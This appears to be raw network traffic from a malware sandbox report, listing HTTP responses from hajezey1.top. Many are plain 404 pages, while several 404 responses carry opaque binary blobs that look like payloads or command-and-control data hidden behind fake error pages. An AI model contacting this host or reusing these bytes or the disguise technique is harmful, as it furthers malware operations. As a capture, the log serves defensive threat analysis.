error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c a5 c7 46 aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 a9 85 87 cd 31 81 78 51 a1 a2 8f 00 8e c2 1c e0 32 02 50 08 88 c5 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 01 9c 20 59 55 11 5c 7c 3b 66 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 99 79 d6 8a 5c d8 06 0e 45 07 0e 7d cf f3 e1 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 92 cc 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 ff 64 45 96 da 19 d1 3a 2d e4 5e 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 d1 8f 4b 04 38 ad 62 14 2c c6 e9 b1 14 37 6c 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 62 5f 64 cd 25 5c 8d b7 f7 3d 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 91 81 a8 be 34 56 9b 46 76 99 86 11 00 83 32 42 ca 43 ce ae 80 3a 95 36 e1 48 50 67 b6 50 b8 81 0e 76 81 de 33 fb 76 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 f1 b5 60 4a 3a 7d 54 7a 99 6c 39 d1 5e f3 5f 76 4e 63 95 b4 0d 16 cb 9c 51 24 22 7d ec b9 68 62 be 7f 13 eb cd f6 25 15 88 d8 95 7f 8e 4a 9b 16 66 45 a7 0d 7c 8e 24 38 69 81 7d af 01 ec 83 41 66 20 ae b8 ea 21 19 a0 4a 48 61 8c bd 77 6a 67 17 0d f1 ee 22 3b 6f ab e5 84 79 f3 53 d3 e4 9a 24 59 d4 55 23 2c 0f 70 d7 b1 56 09 d6 89 bc 08 81 dd ad 80 41 ca 2a 85 d8 de 3e 67 a0 f5 ba 08 c0 fa 5d e4 1f 28 68 bc fa a5 ed 82 ac 11 40 31 02 1a 1f c1 e0 f7 6f f0 e7 17 d3 87 45 d0 ef 44 e9 cf 81 6c 59 20 9b e9 db f0 c3 05 d4 99 cd 21 42 47 c4 a5 cc 49 55 c8 08 f2 bb d9 39 6f 8b 87 9a 0c ef 0f 4e 88 f0 24 bf 34 fa 8b b4 26 bc 06 46 b0 0c 64 08 d8 fd f8 c9 4a 26 1b 3c 2d 6f 73 74 87 35 60 a0 99 ff 6d 37 d3 ad a1 84 0b 84 f3 9e 98 bb 1f 65 c7 26 f0 3b ee a2 8e f0 03 af 63 96 1d f7 a9 15 15 1c 70 40 cd c9 e1 dd b0 c0 0f 25 99 59 c6 1e aa c6 8e 34 3d f6 46 64 68 de be 9c 98 3f d8 2f eb 53 52 a0 0e 94 97 04 76 f9 1e f3 20 64 84 b9 64 4f 55 a7 fa 5b c3 96 c0 88 0b 39 d9 1d 78 09 dd 90 1a c1 03 7a 06 16 f4 d4 6c d1 79 04 da
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 7Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 03 00 00 00 1d 3d 5e Data Ascii: =^
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 42Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 07 9b 01 c2 40 9c e2 0f b3 66 f5 26 0a 5b 22 f9 6a 00 7e c2 5d 31 0e Data Ascii: Uys/~(`:@f&["j~]1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 b1 ba 89 c7 a8 25 9f ae 04 75 64 62 d8 e6 b8 a1 54 5e 1b 80 2b d8 55 a8 c7 ea 87 23 6d 16 be 61 f6 31 6d 17 41 3e da 16 a3 c9 32 6e a0 14 dc ac 2f 7b b0 2d 61 47 b0 7a 0d de 75 8f f9 9f 56 11 36 05 4a f4 e2 d7 c0 07 43 c8 48 09 d2 74 94 82 bf 6c 13 d9 39 03 d5 18 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 8e ff 0e 43 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 85 f6 ff 78 f3 56 db c4 0d 13 13 e3 0f e0 92 24 18 4f c5 03 71 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a f0 96 be 21 51 61 9a d4 3e 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 a2 7a 31 6c 1a 7c 0a 8d 1b f9 e6 0e 10 eb 7e 71 eb 90 f0 1a 10 de 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 22 a6 0f 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 73 33 cd 46 99 48 15 ac af eb d9 55 3d af ba 68 92 de fe 9d 57 7c 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b a8 d4 de 8e 82 11 e8 e4 1f 9e a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 af 5b 85 1f d4 8c 69 91 9c 61 06 f1 2c 9a af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 e4 56 89 8b e1 42 78 d7 9c 9e c3 e0 2b a5 b6 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 a2 aa 45 63 80 e3 1c b1 65 f5 52 48 d4 3f 96 4d 8d e7 17 3f fe e7 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 6e 17 9d f8 77 88 8b 91 db d8 70 5d 07 4b ac 9e ed fd 31 bf c2 75 41 97 7e 49 8e 1c 1e bb aa 5e 4f 92 40 28 0d 93 ce 29 75 1c b4 51 a8 b9 c8 93 f9 ae 21 12 97 ea a4 45 b4 7d 5c b0 26 32 42 2e 8f a6 50 cb 3d 7a d4 38 fa 6b 50 36 0d d9 80 bd bf 6c 13 d9 e6 ae c1 27 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 56 53 af 17 bf c1 1d 09 52 2b e5 8d 83 7b 9e 45 f5 fe 73 8c 5f db c4 87 19 13 bf de 91 90 24 08 4f c5 63 28 c3 a1 61 6e de f5 69 19 13 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4f 19 e0 2c 95 a9 1d 1a f4 96 be 25 51 61 9a 44 45 7e 88 2c c8 48 78 83 cc 4a 98 03 fd 6d 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 cf 0e ff 1a 0c 9b 4a d8 19 8e b6 4d 3b 45 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 15 74 33 f5 89 90 f7 ef e7 ec e7 6e 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac 4f 96 d1 55 7d af ba 68 92 0e ff 9d 7f 7f 55 40 57 74 7b 39 ba e6 ac 04 28 84 42 